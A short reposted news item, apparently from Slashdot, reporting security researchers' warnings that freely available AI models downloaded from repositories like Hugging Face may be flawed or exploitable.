Free AI Programs Prone To Security Risks, Researchers Say
Published on March 30, 2023 at 02:10AM
Companies rushing to adopt hot new types of artificial intelligence should exercise caution when using open-source versions of the technology, some of which may not work as advertised or include flaws that hackers can exploit, security researchers say. From a report: There are few ways to know in advance if a particular AI model -- a program made up of algorithms that can do such things as generate text, images and predictions -- is safe, said Hyrum Anderson, distinguished engineer at Robust Intelligence, a machine learning security company that lists the US Defense Department as a client. Anderson said he found that half the publicly available models for classifying images failed 40% of his tests. The goal was to determine whether a malicious actor could alter the outputs of AI programs in a manner that could constitute a security risk or provide incorrect information. Often, models use file types that are particularly prone to security flaws, Anderson said. It's an issue because so many companies are grabbing models from publicly available sources without fully understanding the underlying technology, rather than creating their own. Ninety percent of the companies Robust Intelligence works with download models from Hugging Face, a repository of AI models, he said.
Published on March 30, 2023 at 02:10AM
Companies rushing to adopt hot new types of artificial intelligence should exercise caution when using open-source versions of the technology, some of which may not work as advertised or include flaws that hackers can exploit, security researchers say. From a report: There are few ways to know in advance if a particular AI model -- a program made up of algorithms that can do such things as generate text, images and predictions -- is safe, said Hyrum Anderson, distinguished engineer at Robust Intelligence, a machine learning security company that lists the US Defense Department as a client. Anderson said he found that half the publicly available models for classifying images failed 40% of his tests. The goal was to determine whether a malicious actor could alter the outputs of AI programs in a manner that could constitute a security risk or provide incorrect information. Often, models use file types that are particularly prone to security flaws, Anderson said. It's an issue because so many companies are grabbing models from publicly available sources without fully understanding the underlying technology, rather than creating their own. Ninety percent of the companies Robust Intelligence works with download models from Hugging Face, a repository of AI models, he said.
Read more of this story at Slashdot.
Comments
Post a Comment